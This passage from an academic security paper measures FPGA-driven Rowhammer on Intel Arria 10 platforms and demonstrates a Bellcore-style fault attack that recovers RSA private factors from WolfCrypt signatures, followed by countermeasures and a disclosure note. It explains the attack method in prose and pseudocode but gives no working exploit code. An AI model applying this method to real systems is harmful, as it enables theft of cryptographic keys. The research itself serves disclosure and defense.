Runs where zero flips occurred during hardware or software hammering were excluded from the flip rate distributions, as 7 The time to send all the requests is not precisely the time to complete all the requests, but it is very close for sufficiently high numbers of requests. The FPGA has a transaction buffer that holds up to 64 transactions after they have been sent by the AFU. The buffer does take some time to clear, but rowhammer is rather ineffective unless at least millions of requests in total are being sent, so this additional time is negligible for the performance measurements we recorded. they are assumed to correspond with sets of rows that are in the same logical bank, but not directly adjacent to each other. The increased hammering speed of the FPGA Rowhammer implementation produces a more than proportional increase in flip rate, which is unsurprising due to the highly physical nature of the rowhammer exploit. As the rowhammer attack is underway, electrical charge is drained from capacitors in the victim row. However, the memory controller is also periodically refreshing the charge in the capacitors. When there are more memory accesses to adjacent rows within each refresh window, there is a higher likelihood that any one bit will be misread on the next refresh and therefore reset to a faulty value. This is why the FPGA's increased memory throughput makes for such a significantly more effective rowhammer attack against the same DRAM chip. Another way to look at hammering performance is by counting the total number of flips produced by a given number of hammers. Figure 8 and Figure 9 show minimum, maximum, and every 10th percentile of the number of flips produced by the AFU and CPU respectively for a range of total number of hammers from 200 million to 2 billion.
These graphs demonstrate how much more effectively the FPGA PAC can generate bit flips in the RAM even after the same number of memory accesses. For hammering attempts that resulted in a non-zero number of bit flips, the AFU exhibits a wide distribution of flip count in the range of 200 million to 800 million hammers which then rapidly narrows in the range of 800 million to 1.2 billion and finally levels out by 1.8 billion hammers. This set of distributions seems to indicate that "flippable" rows will ultimately reach about 80-120 total flips after enough hammering, but it can take anywhere from 200 million hammers (about 10 seconds) to 2 billion hammers (about 100 seconds) to reach that limit. There are also a few rows that only incur a few flips. These samples appear in a consistent pattern demonstrated in Figure 10 , which plots a portion of the data used to create Figure 8 in detail. Each impulse in this plot represents the number of flips after a single run of 2 billion hammers on a particular target row. In Figure 10 , at indices 23 and 36, two of these outliers are visible, each appearing two indices after several samples in the standard 80-120 flip range. These outliers could indicate rows that are affected vary slightly by hammering on rows that are nearby but not adjacent.
C. JackHammer on the Integrated Arria 10 vs. CPU Rowhammer
The JackHammer AFU we designed for the integrated platform is the same as the AFU for the PAC, except that the integrated platform has access to more physical channels for the memory reads. The PAC only has a single PCIe channel; the integrated platform has one UPI channel and two PCIe channels, as well as an "automatic" setting which lets the interface manager select a physical channel automatically. Therefore we present the hammering rates on this platform with two different settings -alternating PCIe lanes on each access and using the automatic setting. However, this platform is only available to us on Intel's servers, so we have only been able to test on one RAM setup and have been unable to get this RAM to flip. 8 The integrated Arria 10 platform shares its chip with a modified Xeon v4style CPU and, on the servers available to us, it is installed on an X99 series motherboard with 64 GB of DDR4 RAM. Figure 11 shows distributions of measured hammering rates on the integrated Arria 10 platform. Compared to the Arria 10 PAC, the integrated Arria 10's hammering rate is more varied, but with a similar mean rate.
1) The Effect of Caching on Rowhammer Performance: A primary reason for the difference in hammering performance between JackHammer on the FPGAs and a typical rowhammer implementation on the CPUs is that when one of the FPGAs reads a line of memory from RAM, it is not cached, so the next read will miss the cache and be directed to the RAM as well. On the other hand, when the CPUs access a line of memory, it is cached, and the memory line must be flushed from cache before the next read is issued, or the next read 8 There are several reasons why this could be the case. Some RAM is simply more physically resistant to flipping by its physical nature. DDR4 memory, which can be found in this system, sometimes has hardware features to block Rowhammer style attacks [4] ; though some methods have been developed to circumvent these protections [19] , these methods ultimately still rely on the ability of the attacker to access the DRAM very many times very quickly, so we consider those methods outside of the scope of this research, which is focused on the relative ability of the FPGA platforms to quickly access DRAM.
will hit the cache instead of RAM, and the physical row in the RAM will not be "hammered."
We show that caching is the primary factor in the performance disparity we observed between FPGA-and CPU-based Rowhammer, we used the PTEditor [53] kernel module to set allocated pages as uncachable before testing hammering performance. We edited the setup of the rowhammer performance tests to allocate many 4 kB pages and set all of those as uncachable instead of one 2 MB huge page, as the kernel module we used to set the pages as uncachable was not correctly configuring the huge pages as uncachable. However, it is still easy to find a large continuous range of physical addresses -when these pages are allocated by OPAE, the physical address is directly available to the software. So the software simply allocates thousands of 4 kB pages, sorts them, and then finds the biggest continuous range within them and attempts to find colliding row addresses within that range. The JackHammer AFU required no modifications; the assembly code to hammer from the CPU was edited to not flush the memory after reading it.
We were unable to compile the PTEditor kernel module to set the memory as uncachable on the i7-3770 system, so the FPGA PAC was moved to a Dell Poweredge R720 system with a Xeon E5-2670 v2 CPU fixed to a clock speed of 2500 MHz and two 4 GB DIMMs of DDR3 DRAM clocked at 1600 MHz. Figure 12 shows the performance of the FPGA PAC and this system's CPU with caching enabled and disabled. Disabling caching produces a significant speedup in hammering for both the PAC and the CPU, but especially for the CPU, which saw a 188% performance increase. With caching enabled, the median hammering rate of the PAC was more than twice that of the CPU, but with caching disabled, the median hammering rate of the PAC was only 22% faster than that of the CPU. Of course, memory accesses on modern systems are extremely complex (even with caching disabled), so there are likely some factors affecting the changes in hammering rate that we cannot describe, but it seems that removing the need for the CPU to flush the memory that it is hammering has brought its performance much closer to that of the PAC, as we hypothesized.
VI. FAULT ATTACK ON RSA USING JACKHAMMER
In this section, we demonstrate the practical possibility of a fault injection Rowhammer from an Arria 10 platform to the WolfCrypt RSA implementation running on its host CPU. Many Rowhammer-based attacks leverage fault injections to exploit cryptographic schemes [7, 8] or gain root privileges [19, 57, 54] . In the RSA fault injection attack first proved by [9] , an intermediate value in the Chinese remainder theorem modular exponentiation algorithm is faulted, causing an invalid signature to be produced. We attack the WolfCrypt RSA implementation in the style of [9] 's attack with both the Arria 10 FPGA and its host CPU, and find that the attack is impractically slow on the CPU and all but unable to cause a fault in a reasonable time window, but the increased hammering speed and flip rate of the Arria 10 FPGA makes the attack possible in the time frame of about 9 RSA signatures. Figure 13 shows the high-level operation of our attack: the WolfCrypt RSA application runs on one core, while a malicious application runs adjacent to it, assisting the Rowhammer AFU on the FPGA in setting up the attack. The Rowhammer AFU causes a hardware fault in the main memory, and when the WolfCrypt application reads the faulty memory, it produces a faulty signature and leaks the private factors used in the RSA scheme.
A. RSA Fault Injection Attacks
In general, a fault injection attack is an attack where a hardware fault is intentionally caused in such a way that security of some sort is compromised. In this section, we implement a fault injection attack against the Chinese remainder theorem implementation of the RSA algorithm, commonly known as the Bellcore attack [9] . 1 shows a normally functioning Chinese remainder theorem (CRT) RSA signing scheme where the signature S is computed by raising a message m to the private exponent dth power, modulo N . d p and d q , are precomputed as d mod p − 1 and d mod q − 1, where p and q are the prime factors of N [5] . When one of the intermediates S q or S p is computed incorrectly, an interesting case arises. Consider the difference between a correctly computed signature S and an incorrectly computed signature S , computed with an invalid intermediate S p . The difference S − S leaves a factor of q times the difference S p − S p , so the GCD of S − S and N is the other factor p [5] . This reduces the problem of factoring N into p and q by brute force to a simple subtraction and GCD operation, so the private factors (p, q) are effectively broken if the attacker has just one valid signature S and one faulty signature S . The same factor can be recovered with just the one faulty signature if the message m and public key e are known; it is also equal to the GCD of S e − m and N . a) Fault Injection Attack with RSA Base Blinding: A common modification to any RSA scheme is the addition of base blinding, effective against simple and differential power analysis side-channel attacks, but vulnerable to a correlational power analysis attack demonstrated by [59] . Base blinding is used by default in the WolfCrypt RSA-CRT signature scheme which we attack. In this blinding process shown in 2, the hash of message is multiplied by a randomly generated number before it is encrypted by the private key. The resulting signature must then be multiplied by the encryption of the inverse of the random number to generate a valid signature, as shown in 3.
This blinding scheme does not prevent the Bellcore fault injection attack from working. Consider a valid signature blinded with random factor r1 and an invalid signature blinded with r2. When the faulty signature is subtracted by the valid signature, the valid and blinded intermediates S pb are each unblinded and cancel as before, as shown in Equation 1.
So ultimately, there is still a factor of q in the the difference S − S which can be extracted with a GCD as before.
B. Our Attack a) Approach and Justification: We developed a simplified attack model to test the effectiveness of the Arria 10 Rowhammer in a fault injection scenario. Our model simplifies the setup of the attack so that we can efficiently measure the performance of both CPU rowhammer and our JackHammer implementation. We sign the same message with the same key repeatedly while the Rowhammer exploit runs, and count the number of correct signatures until a faulty signature is generated, leaking the key used for signing. b) Our Attack Setup: In summary, our simplified attack model works as follows: there is one program that runs the "victim" and "attacker," as well as controlling the JackHammer AFU. It first allocates a large block of memory and checks it for conflicting row addresses. It then quickly tests which of those rows can be faulted with hammering. Each row is hammered with 1,000,000 memory accesses 10 times and the total number of flips across the 10 runs is added up within each of the sixty-four 1024-bit possible targets for the attack, for example: One of the typical complications of a Rowhammer fault injection attack is ensuring that the victim's data is located in a row that can be hammered. In our simplified model, we choose the location of the victim data manually by row number within the set of continuous rows and offset within the row so that we may easily test the effectiveness of the attack at various rows and various locations. In a real attack, the location of the victim program's memory can be controlled by the attacker with a technique known as page spraying [54] , which is simply allocating a large number of pages and then deallocating a select few, filling the memory in an attempt to cause the victim program to allocate the right pages. Improvements in this process can be made; for example, [7] demonstrated how cache timing side-channels can be used to gather information about the physical addresses of data being used by the victim process. After our simplified model selects a target row, it instructs the Rowhammer AFU to begin hammering at the adjacent rows. Then, in the "victim" program, the targeted data (the precomputed intermediate value d mod q − 1) is copied to the 
The inverse of r r i will be used for unblinding 4: m b ← m · r e mod n 5:
return m b m b is the "blinded" version of the message which is encrypted to create a signature 6: end procedure Algorithm 3 RSA Deblinding Used in WolfCrypt 1: procedure DEBLIND(s b , r i ) s b : the blinded signature, equal to (mr e ) d mod n = m d r mod n; r i : the inverse of the random blinding factor, computed in 2 2: s ← s · r i mod n s · r i mod n = m d r · r −1 mod n 3:
return s s is the regular, unblinded signature 4: end procedure target address selected by the "attacker." The "victim" then enters a loop where it reads back the data from the target row and uses it as part of an RSA key to create a signature from a sample message. However, when the memory is read back from the target address, the attack cannot work if the target address's data is still cached, because the value will be read from the non-faulty cache instead of from DRAM, where any faults will occur. In a real attack, the attacker typically uses an eviction set to evict the targeted memory from cache. For more discussion of eviction sets in the context of this paper, see section IV. For our simplified model, we simply open a new thread which directly flushes the targeted cache lines on a given time interval. As we show below, the performance of the attack depends significantly on the time interval between flushes.
C. Performance of the Attack
In this section, we show that our JackHammer implementation with optimal settings can cause a faulty signature an average of 17% faster than a typical CPU-based, softwaredriven rowhammer implementation with optimal settings. In some scenarios, the performance is as much as 4.8 times that of the software implementation. However, under some conditions, the software implementation can be more likely to cause a fault over a longer period of time.
The performance of this fault injection attack is highly dependent on the time interval between evictions, and as such we present all of our results in this section as functions of the eviction interval. Each eviction triggers a subsequent reload from memory when the key is read for the next signature, which refreshes the capacitors in the DRAM. Whenever DRAM capacitors are refreshed, any accumulated voltage error in each capacitor (due to Rowhammer or any other physical effect) is either solidified as a new faulty bit value or reset to a safe and correct value. Too short of an interval between evictions will cause the DRAM capacitors to be refreshed too quickly to be flipped with a high probability. On the other hand, however, longer intervals can mean the attack is waiting to evict the memory for a longer time while a bit flip has already occurred. It is crucial to note, also, that DRAM capacitors are automatically refreshed by the memory controller on a 64 ms interval 9 [20] . On some systems, this interval is configurable: faster refresh rates reduce the rate of memory errors, including those induced by Rowhammer, but they can impede maximum performance because the memory spends more time doing maintenance refreshes rather than serving read and write request. For more discussion on modifying row In table Table III we present two metrics with which we compare JackHammer and a standard CPU rowhammer implementation. This table shows the mean number of signatures until a faulty signature is produced and the ultimate probability of success of an attack within 1000 signatures against a random key in a randomly selected chunk of memory within a row known to be vulnerable to rowhammer. Figure 14 highlights the mean number of signatures until a faulty signature for the 16 ms to 96 ms range of eviction latency. With an eviction interval of 96 ms, the JackHammer attack achieves the lowest average number of signatures before a fault, at only 58, 25% faster than the best performance of the CPU rowhammer attack. The CPU attack is impeded significantly by shorter eviction latency, while the JackHammer implementation is not, indicating that on systems where the DRAM row refresh rate has been increased to protect against memory faults and rowhammer attacks, JackHammer likely offers substantially improved attack performance.
VII. COUNTERMEASURES
a) Detection Using Hardware Monitoring: Microarchitectural side-channel attacks against CPUs leave traces in hardware performance counters (HPCs) such as cache hit and miss counters. Previous works have paired these HPCs with advanced machine learning techniques to implement realtime detectors for micro-architectural attacks [10, 13, 64, 23] . Gülmezoglu et al.'s FortuneTeller [23] showed that an unsupervised machine learning model can reliably detect many types of side-channel attacks including several cache attacks and Rowhammer. While such performance counters do not exist in the same form on the Arria 10 GX platforms, they could be implemented by the FIM. The FIM can monitor memory accesses and mark it as a cache hit or miss, or the CPU performance counters can be used in some scenarios. We, therefore, expect that a well-designed detection system could thwart many side-channel attacks on the FPGA-CPU interface.
b) Cache Partitioning and Pinning: Many different approaches for cache partitioning mechanisms are proposed to protect CPUs against cache attacks. Some are implementable in software [35, 63, 67, 36] while others require hardware support [41, 17, 18] . When trying to protect FPGA caches against cache attacks, especially the hardware-based approaches should be taken into account. For example, the FIM could partition the cache into several parts, such that each AFU can only use a subset of the cache lines in the local cache. Another approach would introduce an additional flag to the CCI-P interface telling the local caching agent which cache lines to pin to the cache. c) Increasing DRAM Row Refresh Rate: A standard defense against rowhammer attacks is increasing the rate at which DRAM is refreshed. DDR3 and DDR4 specifications require that each row is refreshed at least every 64 ms, but many systems can be configured to refresh each row every 32 or 16 ms for better memory stability. When we measured the performance of our fault injection attack in section VI, we measured the performance with varying intervals between evictions of the targeted data, simulating equivalent intervals in row refresh rate, since each eviction causes a subsequent row refresh when the memory is read by the victim program. Table III shows that under 1% of attempted Rowhammer attacks from both CPU and FPGA were successful with an eviction interval of 32 ms, compared to 14% of CPU attacks and 26% of FPGA attacks with an interval of 64 ms, suggesting that increasing the row refresh rate would significantly impede even the more powerful FPGA Rowhammer attack. A thorough attack could likely still find some vulnerable memory locations on this system, but this defense could give a victim valuable time to detect an attack before a fault occurs. d) Disabling Hugepages and Virtualizing AFU Address Space: Intel is aware of the fact that making physical addresses available to userspace through OPAE is a bad idea as a note on the documentation [29] of the fpgaGetIOAddress function shows. Additionally to exposing physical addresses, OPAE makes heavy use of hugepages to ensure physical address continuity of buffers shared with the AFU. However, it is well known that disabling hugepages increases the barrier of finding eviction sets [32, 42] which in turn makes cache attacks more difficult. We suggest disabling OPAE's usage of hugepages. To do so, the AFU address space has to be virtualized no matter whether the AFU is attached to a virtual machine or the host itself. e) Protection against Bellcore Fault Attack: Defenses against fault injection attacks proposed in the original Bellcore whitepaper [9] include verifying the signature before releasing it (simple but inefficient for performance), and random padding of the message before signing, which ensures that no unique message is ever signed twice and that the exact plaintext of a faulty signature cannot be determined. For example, OpenSSL uses padding, but it is PKCS #1 padding, which is deterministic and therefore useless against the Bellcore attack. OpenSSL protects against the Bellcore attack by verifying the signature with its plaintext and public key and recomputing the exponentiation by a slower but safer single exponentiation instead of by the CRT if it does not [12] . This is safe against the traditional Bellcore fault attack, but [12] demonstrated two other fault injections against the RSA-CRT scheme that are not prevented by this error checking method. After we reported the vulnerability in WolfSSL discovered in this paper, version 4.3.0 of WolfSSL was updated to include a signature verification to protect against Bellcore-style fault injection attacks.
VIII. CONCLUSION
In this work, we show that modern FPGA-CPU hybrid systems can be more vulnerable to well-known hardware attacks that are traditionally seen on CPU-only systems. We show that the shared cache systems of the Arria 10 GX and its host CPU present possible CPU to FPGA, FPGA to CPU, and FPGA to FPGA attack vectors. For Rowhammer, we show that the Arria 10 GX is capable of causing more DRAM faults in less time than modern CPUs. Our research indicates that defense against hardware side-channels is just as essential for modern FPGA systems as it is for modern CPUs. Of course, the security of any device physically installed in a system, like a network card or graphics card, is important, but FPGAs present additional security challenges due to their inherently flexible nature. From a security perspective, a userconfigurable FPGA on a cloud system needs to be treated with at least as much care and caution as a user-controlled CPU thread, as it can exploit many of the same vulnerabilities.
